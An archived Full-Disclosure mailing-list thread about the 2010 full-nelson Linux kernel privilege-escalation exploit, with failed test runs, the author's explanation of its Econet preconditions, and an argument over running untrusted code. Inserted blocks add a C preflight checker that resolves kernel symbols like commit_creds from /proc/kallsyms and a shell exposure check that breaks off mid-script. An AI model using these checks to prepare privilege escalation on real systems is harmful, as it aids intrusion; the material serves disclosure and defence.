mmap(0x7f016b2e6000, 17016, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f016b2e6000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f016b4fd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f016b4fc000
arch_prctl(ARCH_SET_FS, 0x7f016b4fc6e0) = 0
mprotect(0x7f016b2e1000, 12288, PROT_READ) = 0
munmap(0x7f016b4fe000, 15513) = 0
pipe([3, 4]) = 0
socket(PF_ECONET, SOCK_DGRAM, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
open("/dev/zero", O_RDONLY) = 5
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 11), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f016b501000
write(1, "[*] Failed to open file descripto"..., 37[*] Failed to open file descriptors.
) = 37
exit_group(-1) = ?



On Mon, Dec 13, 2010 at 6:12 PM, Ariel Biener  wrote:

> But he said that RedHat (and thus CentOS) doesn't have Econet enabled by
> default.
>
> --Ariel
>
> fireb...@backtrack.com.br wrote:
> > I tested it on a VM with CentOS 5.5 i386 updated and did not work.
> >
> > Last login: Tue Dec 13 12:48:54 2010
> > [r...@localhost ~]# nano full-nelson.c
> > [r...@localhost ~]# gcc -o full-nelson.c full-nelson
> > [r...@localhost ~]# ./full-nelson
> > [*] Failed to open file descriptors.
> > [r...@localhost ~]# uname -a
> > Linux localhost.localdomain 2.6.18-194.26.1.el5 #1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
> > [r...@localhost ~]#
> >
> > My 10 cents:)
> >
> > @firebitsbr
> >
> >
>
> --
>  --
>  Ariel Biener
>  e-mail: ar...@post.tau.ac.il
>  PGP: http://www.tau.ac.il/~ariel/pgp.html
>
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread coderman
On Mon, Dec 13, 2010 at 12:40 PM, Cal Leeming [Simplicity Media Ltd]
 wrote:
> I've seen far too many people just sending back "Failed to open file
> descriptors" without giving any indication as to what could have happened.
> ...
> Anyways, the code failed on our sandbox.. see below:
> ...
> socket(PF_ECONET, SOCK_DGRAM, 0)
>   = -1 EAFNOSUPPORT (Address family not supported by protocol)


that's the relevant part for you.



Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread dan . j . rosenberg
Please don't inundate me with e-mail because none of you bothered to read the 
exploit header.

The exploit so far has a 100% success rate on the systems it was designed to 
work on.

I don't think this is rocket science.  If your distribution does not compile 
Econet, then the exploit obviously won't be able to open an Econet socket.  
This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS, Slackware, and more. 
 This doesn't mean you're not vulnerable, it just means this particular exploit 
won't work.

If your distro doesn't export the relevant symbols (Debian), ditto above.

If your distro has patched the Econet vulnerabilities I used to trigger this 
(Ubuntu), ditto above.

This was done on purpose, to avoid giving a weaponized exploit to people who 
shouldn't have one.

-Dan


Sent from my Verizon Wireless BlackBerry

-Original Message-
From: "Cal Leeming [Simplicity Media Ltd]"

Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 13 Dec 2010 20:40:45 
To: Ariel Biener
Cc: ; ; 
; 
Subject: Re: [Full-disclosure] Linux kernel exploit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
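
The three reasons Dan gives (no Econet in the kernel, the needed symbols not exported, the Econet bugs already patched) account for every "Failed to open file descriptors" in this thread, and the strace Cal posted shows the first one directly: socket(PF_ECONET, SOCK_DGRAM, 0) returning EAFNOSUPPORT. The preflight check below is an added example, not part of full-nelson.c and not anything Dan posted. It tests the first two preconditions without running the exploit: it tries the Econet socket and reports why it failed, and it parses /proc/kallsyms the same way the exploit's get_kernel_sym() does (hex address, type letter, name) to tell "symbol absent" apart from "symbol present but address zeroed". The embedded kallsyms excerpt is constructed, with made-up addresses; the three symbol names in main() are assumed for illustration, since the section of the exploit that names the symbols it resolves is not reproduced in this thread. The third precondition (whether the Econet bugs are patched) cannot be probed without triggering the OOPS, so it is deliberately left out.

```c
#define _GNU_SOURCE                   /* for fmemopen() */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_ECONET
#define AF_ECONET 19                  /* Acorn Econet, PF_ECONET in <bits/socket.h> */
#endif

enum { SYM_OK = 0, SYM_MISSING = 1, SYM_HIDDEN = 2 };

/* Constructed /proc/kallsyms excerpt: the addresses are made up; the names
 * are real kernel symbols used here only to exercise the parser. */
static const char SAMPLE_KALLSYMS[] =
    "ffffffff81000000 T _text\n"
    "ffffffff8107a2c0 T commit_creds\n"
    "ffffffff8107a5e0 T prepare_kernel_cred\n"
    "ffffffffa0123450 t econet_ioctl\t[econet]\n"
    "0000000000000000 T hidden_symbol_example\n";

/* Precondition 1: can an Econet datagram socket be opened at all?
 * Returns 0 on success, otherwise the errno from socket(). */
int econet_probe(void)
{
    int fd = socket(AF_ECONET, SOCK_DGRAM, 0);
    if (fd < 0)
        return errno;
    close(fd);
    return 0;
}

/* Translate the probe result into the reason the exploit only reports as
 * "Failed to open file descriptors". */
const char *econet_probe_reason(int err)
{
    switch (err) {
    case 0:            return "Econet socket opened: CONFIG_ECONET is available";
    case EAFNOSUPPORT: return "no Econet support in this kernel (CONFIG_ECONET off)";
    case EPERM:
    case EACCES:       return "socket() denied by policy: Econet presence unknown";
    default:           return "unexpected socket() failure";
    }
}

/* Precondition 2: symbol resolution.  Scan a kallsyms-format stream
 * ("<hex addr> <type> <name>[\t[module]]") for one symbol.  Returns 1 and
 * stores the address if found, 0 otherwise.  Same parse as the exploit's
 * get_kernel_sym(), with %lx in place of %p. */
int kallsyms_lookup(FILE *f, const char *sym, unsigned long *addr)
{
    char line[512], name[256], type;
    unsigned long a;

    rewind(f);
    while (fgets(line, sizeof line, f) != NULL) {
        if (sscanf(line, "%lx %c %255s", &a, &type, name) != 3)
            continue;
        if (strcmp(name, sym) == 0) {
            *addr = a;
            return 1;
        }
    }
    return 0;
}

/* Classify: absent (not compiled in / not exported), present but zeroed
 * (kptr_restrict, added in 2.6.38, or an unprivileged read), or usable. */
int symbol_status(FILE *f, const char *sym)
{
    unsigned long addr;
    if (!kallsyms_lookup(f, sym, &addr))
        return SYM_MISSING;
    return addr == 0 ? SYM_HIDDEN : SYM_OK;
}

/* Self-test helpers: run the same code over the constructed excerpt. */
int sample_symbol_status(const char *sym)
{
    FILE *f = fmemopen((void *)SAMPLE_KALLSYMS, sizeof SAMPLE_KALLSYMS - 1, "r");
    if (f == NULL)
        return -1;
    int st = symbol_status(f, sym);
    fclose(f);
    return st;
}

unsigned long sample_symbol_addr(const char *sym)
{
    unsigned long addr = 0;
    FILE *f = fmemopen((void *)SAMPLE_KALLSYMS, sizeof SAMPLE_KALLSYMS - 1, "r");
    if (f == NULL)
        return 0;
    kallsyms_lookup(f, sym, &addr);
    fclose(f);
    return addr;
}

int main(void)
{
    /* Symbol names assumed for illustration: substitute the ones your copy
     * of the exploit actually passes to get_kernel_sym(). */
    static const char *const syms[] = { "commit_creds", "prepare_kernel_cred", "econet_ioctl" };
    static const char *const labels[] = { "resolved", "not in kallsyms", "present, address hidden" };

    printf("[*] socket(AF_ECONET, SOCK_DGRAM, 0): %s\n", econet_probe_reason(econet_probe()));

    FILE *f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        perror("[*] /proc/kallsyms");
        return 1;
    }
    for (size_t i = 0; i < sizeof syms / sizeof syms[0]; i++)
        printf("[*] %-20s %s\n", syms[i], labels[symbol_status(f, syms[i])]);
    fclose(f);
    return 0;
}
```

Run it as the same unprivileged user who would run the exploit, since that is the view that matters. A kernel that answers EAFNOSUPPORT, or that lists none of the symbols, is not thereby patched against CVE-2010-4258; it only lacks the Econet trigger and symbol resolution this particular exploit depends on, which is exactly Dan's point.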


Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]
Sorry Dan, I did a very quick copy and paste job, without reading the
headers. I simply don't have time to read the code notes of every single
exploit released.

I would say that, if you are fed up with being inundated with emails, then
perhaps you should mark these notes very clearly in big red writing at the
top of the email like this, for those people who don't have much time to
read these notes ;)

On Mon, Dec 13, 2010 at 9:08 PM,  wrote:

> Please don't inundate me with e-mail because none of you bothered to read
> the exploit header.
>
> The exploit so far has a 100% success rate on the systems it was designed
> to work on.
>
> I don't think this is rocket science.  If your distribution does not
> compile Econet, then the exploit obviously won't be able to open an Econet
> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
> this particular exploit won't work.
>
> If your distro doesn't export the relevant symbols (Debian), ditto above.
>
> If your distro has patched the Econet vulnerabilities I used to trigger
> this (Ubuntu), ditto above.
>
> This was done on purpose, to avoid giving a weaponized exploit to people
> who shouldn't have one.
>
> -Dan
>
>
> Sent from my Verizon Wireless BlackBerry
>
> -Original Message-
> From: "Cal Leeming [Simplicity Media Ltd]"
>
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Mon, 13 Dec 2010 20:40:45
> To: Ariel Biener
> Cc: ; ; <
> bugt...@securityfocus.com>; 
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]
   1. It ran on a one-time server which gets re-generated every time it's
   restarted (which is every time a testing session has finished)
   2. I did a *very* brief look in the code for shell code etc, and based on
   the noise already on the board, there wasn't any risk.
   3. Even if there was dodgy shell code in there, it still would have posed
   no risk, because the sandbox is re-generated every time (see comment 1)

No more troll feed for you!

On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:

> wait wait wait.
>
> you don't have time to read header notes, but do have time to run code on
> your system without really knowing what it does?
>
> Can I send you some code? It's a Linux 2.6.* 0day, remote root.
>
>
> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Sorry Dan, I did a very quick copy and paste job, without reading the
>> headers. I simply don't have time to read the code notes of every single
>> exploit released.
>>
>> I would say that, if you are fed up with being inundated with emails, then
>> perhaps you should mark these notes very clearly in big red writing at
>> the top of the email like this, for those people who don't have much time
>> to read these notes ;)
>>
>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>
>>> Please don't inundate me with e-mail because none of you bothered to read
>>> the exploit header.
>>>
>>> The exploit so far has a 100% success rate on the systems it was designed
>>> to work on.
>>>
>>> I don't think this is rocket science.  If your distribution does not
>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>>> this particular exploit won't work.
>>>
>>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>>
>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>> this (Ubuntu), ditto above.
>>>
>>> This was done on purpose, to avoid giving a weaponized exploit to people
>>> who shouldn't have one.
>>>
>>> -Dan
>>>
>>>
>>> Sent from my Verizon Wireless BlackBerry
>>>
>>> -Original Message-
>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>
>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>> Date: Mon, 13 Dec 2010 20:40:45
>>> To: Ariel Biener
>>> Cc: ; ; <
>>> bugt...@securityfocus.com>; 
>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>
>>>
>>
>>
>>
>> --
>>
>> Cal Leeming
>>
>> Operational Security & Support Team
>>
>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>> supp...@simplicitymedialtd.co.uk
>> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
>>
>> *IM: *AIM / ICQ / MSN / Skype (available upon request)
>> Simplicity Media Ltd. All rights reserved.
>> Registered company number 7143564
>>
>>
>>
>
>


-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji
I know in your perfect world nothing could ever break out of a sandbox, but
this just isn't true.

No more coco-pops for you, maybe some brain food!

On Mon, Dec 13, 2010 at 9:19 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

>
>1. It ran on a one-time server which gets re-generated every time its
>restarted (which is everytime a testing session has finished)
>2. I did a *very* brief look in the code for shell code etc, and based
>on the noise already on the board, there wasn't any risk.
>3. Even if there was dodgy shell code in there, it still would have
>posed no risk, because the sandbox is re-generated every time (see comment
>1)
>
> No more troll feed for you!
>
> On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:
>
>> wait wait wait.
>>
>> you don't have time to read header notes, but do have time to run code on
>> your system without really knowing what it does?
>>
>> Can I send you some code? It's a Linux 2.6.* 0day, remote root.
>>
>>
>> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>
>>> Sorry Dan, I did a very quick copy and paste job, without reading the
>>> headers. I simply don't have time to read the code notes of every single
>>> exploit released.
>>>
>>> I would say that, if you are fed up with being inundated with emails,
>>> then perhaps you should mark these notes very clearly in big red writing
>>> at the top of the email like this, for those people who don't have much
>>> time to read these notes ;)
>>>
>>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>>
>>>> Please don't inundate me with e-mail because none of you bothered to
>>>> read the exploit header.
>>>>
>>>> The exploit so far has a 100% success rate on the systems it was
>>>> designed to work on.
>>>>
>>>> I don't think this is rocket science.  If your distribution does not
>>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just 
>>>> means
>>>> this particular exploit won't work.
>>>>
>>>> If your distro doesn't export the relevant symbols (Debian), ditto
>>>> above.
>>>>
>>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>>> this (Ubuntu), ditto above.
>>>>
>>>> This was done on purpose, to avoid giving a weaponized exploit to people
>>>> who shouldn't have one.
>>>>
>>>> -Dan
>>>>
>>>>
>>>> Sent from my Verizon Wireless BlackBerry
>>>>
>>>> -Original Message-
>>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>>
>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>> Date: Mon, 13 Dec 2010 20:40:45
>>>> To: Ariel Biener
>>>> Cc: ; ; <
>>>> bugt...@securityfocus.com>; 
>>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>>
>>>>
>>>
>>>
>>>
>>> --
>>>
>>> Cal Leeming
>>>
>>> Operational Security & Support Team
>>>
>>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>>> supp...@simplicitymedialtd.co.uk
>>> *Fax: *+44 (02476) 578987 | *Email: *
>>> cal.leem...@simplicitymedialtd.co.uk
>>> *IM: *AIM / ICQ / MSN / Skype (available upon request)
>>> Simplicity Media Ltd. All rights reserved.
>>> Registered company number 7143564
>>>
>>>
>>>
>>
>>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji
wait wait wait.

you don't have time to read header notes, but do have time to run code on
your system without really knowing what it does?

Can I send you some code? It's a Linux 2.6.* 0day, remote root.

On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Sorry Dan, I did a very quick copy and paste job, without reading the
> headers. I simply don't have time to read the code notes of every single
> exploit released.
>
> I would say that, if you are fed up with being inundated with emails, then
> perhaps you should mark these notes very clearly in big red writing at the
> top of the email like this, for those people who don't have much time to
> read these notes ;)
>
> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>
>> Please don't inundate me with e-mail because none of you bothered to read
>> the exploit header.
>>
>> The exploit so far has a 100% success rate on the systems it was designed
>> to work on.
>>
>> I don't think this is rocket science.  If your distribution does not
>> compile Econet, then the exploit obviously won't be able to open an Econet
>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>> this particular exploit won't work.
>>
>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>
>> If your distro has patched the Econet vulnerabilities I used to trigger
>> this (Ubuntu), ditto above.
>>
>> This was done on purpose, to avoid giving a weaponized exploit to people
>> who shouldn't have one.
>>
>> -Dan
>>
>>
>> Sent from my Verizon Wireless BlackBerry
>>
>> -----Original Message-
>> From: "Cal Leeming [Simplicity Media Ltd]"
>>
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> Date: Mon, 13 Dec 2010 20:40:45
>> To: Ariel Biener
>> Cc: ; ; <
>> bugt...@securityfocus.com>; 
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>>
>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Eyeballing Weev
Admitting you will not feed the trolls shows that you have fed the trolls
at some point in time and have fallen for a troll.

There is no way to properly "damage control" this statement.

YHBT YHL HAND

On 12/13/2010 04:19 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> No more troll feed for you!
>



Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]
Actually Ryan, I think you'll find a lot of people just wanted to
contribute towards testing, as most authors will appreciate the masses
testing on as many systems as possible.

It's not a case of anyone "showing off", it's simply that a lot of people
don't have time to read the "small print".

On Mon, Dec 13, 2010 at 9:27 PM, Ryan Sears  wrote:

> Hey Dan,
>
> Freaking THANK YOU first and foremost. I've been waiting for someone to say
> that for days now, and was just about to myself.
>
> Just because everyone and their brother wants to show off that they can
> compile & run some software (herp a derp, good job) DOESN'T mean they should
> immediately post it here. I tested it against an OLDER KERNEL on purpose
> because I actually read the headers and the exploit worked as expected. I
> knew that this was responsibly disclosed, so it was already patched on any
> system that I updated. If you don't have the proper symbols, then the
> exploit doesn't have the proper offsets, and the exploit will fail. Plain
> and simple. *THEN* there's people who don't even bother to read that "Red
> Hat does not support Econet by default". DOES NOT. As in the exploit WON'T
> WORK!
>
> It's pathetic that the original exploit dev has to waste his time saying
> the same thing 5 times.
>
> 
>
> Ryan Sears
>
> - Original Message -
> From: "dan j rosenberg" 
> To: "Cal Leeming [Simplicity Media Ltd]" <
> cal.leem...@simplicitymedialtd.co.uk>,
> full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" <
> ar...@post.tau.ac.il>
> Cc: "leandro lista" ,
> fireb...@backtrack.com.br, bugt...@securityfocus.com,
> full-disclosure@lists.grok.org.uk
> Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> Please don't inundate me with e-mail because none of you bothered to read
> the exploit header.
>
> The exploit so far has a 100% success rate on the systems it was designed
> to work on.
>
> I don't think this is rocket science.  If your distribution does not
> compile Econet, then the exploit obviously won't be able to open an Econet
> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
> this particular exploit won't work.
>
> If your distro doesn't export the relevant symbols (Debian), ditto above.
>
> If your distro has patched the Econet vulnerabilities I used to trigger
> this (Ubuntu), ditto above.
>
> This was done on purpose, to avoid giving a weaponized exploit to people
> who shouldn't have one.
>
> -Dan
>
>
> Sent from my Verizon Wireless BlackBerry
>
> -Original Message-
> From: "Cal Leeming [Simplicity Media Ltd]"
>
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Mon, 13 Dec 2010 20:40:45
> To: Ariel Biener
> Cc: ; ; <
> bugt...@securityfocus.com>; 
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji
It doesn't contribute to testing; I can assure you there have been enough
'tests' of this exploit.

On Mon, Dec 13, 2010 at 9:32 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Actually Ryan, I think you'll find a lot of people just wanted to
> contribute towards testing, as most authors will appreciate the masses
> testing on as many systems as possible.
>
> It's not a case of anyone "showing off", it's simply that a lot of people
> simply don't have time to read the "small print".
>
> On Mon, Dec 13, 2010 at 9:27 PM, Ryan Sears  wrote:
>
>> Hey Dan,
>>
>> Freaking THANK YOU first and foremost. I've been waiting for someone to
>> say that for days now, and was just about to myself.
>>
>> Just because everyone and their brother wants to show off that they can
>> compile & run some software (herp a derp, good job) DOESN'T mean they should
>> immediately post it here. I tested it against an OLDER KERNEL on purpose
>> because I actually read the headers and the exploit worked as expected. I
>> knew that this was responsibly disclosed, so it was already patched on any
>> system that I updated. If you don't have the proper symbols, then the
>> exploit doesn't have the proper offsets, and the exploit will fail. Plain
>> and simple. *THEN* there's people who don't even bother to read that "Red
>> Hat does not support Econet by default". DOES NOT. As in the exploit WON'T
>> WORK!
>>
>> It's pathetic that the original exploit dev has to waste his time saying
>> the same thing 5 times.
>>
>> 
>>
>> Ryan Sears
>>
>> - Original Message -
>> From: "dan j rosenberg" 
>> To: "Cal Leeming [Simplicity Media Ltd]" <
>> cal.leem...@simplicitymedialtd.co.uk>,
>> full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" <
>> ar...@post.tau.ac.il>
>> Cc: "leandro lista" ,
>> fireb...@backtrack.com.br, bugt...@securityfocus.com,
>> full-disclosure@lists.grok.org.uk
>> Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>> Please don't inundate me with e-mail because none of you bothered to read
>> the exploit header.
>>
>> The exploit so far has a 100% success rate on the systems it was designed
>> to work on.
>>
>> I don't think this is rocket science.  If your distribution does not
>> compile Econet, then the exploit obviously won't be able to open an Econet
>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>> this particular exploit won't work.
>>
>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>
>> If your distro has patched the Econet vulnerabilities I used to trigger
>> this (Ubuntu), ditto above.
>>
>> This was done on purpose, to avoid giving a weaponized exploit to people
>> who shouldn't have one.
>>
>> -Dan
>>
>>
>> Sent from my Verizon Wireless BlackBerry
>>
>> -Original Message-
>> From: "Cal Leeming [Simplicity Media Ltd]"
>>
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> Date: Mon, 13 Dec 2010 20:40:45
>> To: Ariel Biener
>> Cc: ; ; <
>> bugt...@securityfocus.com>; 
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Ryan Sears
Hey Dan,

Freaking THANK YOU first and foremost. I've been waiting for someone to say 
that for days now, and was just about to myself. 

Just because everyone and their brother wants to show off that they can 
compile & run some software (herp a derp, good job) DOESN'T mean they should 
immediately post it here. I tested it against an OLDER KERNEL on purpose 
because I actually read the headers and the exploit worked as expected. I knew 
that this was responsibly disclosed, so it was already patched on any system 
that I updated. If you don't have the proper symbols, then the exploit doesn't 
have the proper offsets, and the exploit will fail. Plain and simple. *THEN* 
there's people who don't even bother to read that "Red Hat does not support 
Econet by default". DOES NOT. As in the exploit WON'T WORK!

It's pathetic that the original exploit dev has to waste his time saying the 
same thing 5 times.



Ryan Sears

- Original Message -
From: "dan j rosenberg" 
To: "Cal Leeming [Simplicity Media Ltd]" 
, 
full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" 
Cc: "leandro lista" , fireb...@backtrack.com.br, 
bugt...@securityfocus.com, full-disclosure@lists.grok.org.uk
Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Please don't inundate me with e-mail because none of you bothered to read the 
exploit header.

The exploit so far has a 100% success rate on the systems it was designed to 
work on.

I don't think this is rocket science.  If your distribution does not compile 
Econet, then the exploit obviously won't be able to open an Econet socket.  
This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS, Slackware, and more. 
 This doesn't mean you're not vulnerable, it just means this particular exploit 
won't work.

If your distro doesn't export the relevant symbols (Debian), ditto above.

If your distro has patched the Econet vulnerabilities I used to trigger this 
(Ubuntu), ditto above.

This was done on purpose, to avoid giving a weaponized exploit to people who 
shouldn't have one.

-Dan


Sent from my Verizon Wireless BlackBerry

-Original Message-
From: "Cal Leeming [Simplicity Media Ltd]"
    
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 13 Dec 2010 20:40:45 
To: Ariel Biener
Cc: ; ; 
; 
Subject: Re: [Full-disclosure] Linux kernel exploit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
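The precondition Dan restates in the message quoted above, that the exploit needs a kernel which can open an Econet socket at all, is also the quickest thing for a defender to check on a fleet. The shell script below is an added example and is not code from the thread or from Dan. It reads a kernel config in the /boot/config-$(uname -r) format and the *.conf files of a modprobe configuration directory (both paths are parameters, so it can be run against constructed files) and classifies a host's Econet exposure. The "install econet /bin/true" and "alias net-pf-19 off" patterns it recognises are the ones Debian and Ubuntu use to keep rarely used protocol modules from being auto-loaded; treating those two lines as "auto-load blocked" is this example's assumption, not something the thread states.

```shell
#!/bin/sh
# Added example (not from the thread): an exposure check for the precondition
# Dan describes, i.e. whether this kernel can open an Econet socket at all.
# Assumptions: the kernel config uses the /boot/config-$(uname -r) format and
# modprobe configuration lives in *.conf files under a directory such as
# /etc/modprobe.d. Both paths are parameters so the functions can be run
# against constructed files.

# econet_state CONFIG_FILE
# Prints "builtin" (CONFIG_ECONET=y), "module" (CONFIG_ECONET=m) or "absent"
# (the "# CONFIG_ECONET is not set" case, or no such option at all).
econet_state() {
    if grep -q '^CONFIG_ECONET=y$' "$1"; then
        echo builtin
    elif grep -q '^CONFIG_ECONET=m$' "$1"; then
        echo module
    else
        echo absent
    fi
}

# econet_autoload_blocked MODPROBE_DIR
# Returns 0 when some *.conf in the directory stops the econet module from
# being auto-loaded by a socket(AF_ECONET, ...) call: either
# "install econet /bin/true" (modprobe runs /bin/true instead of loading it)
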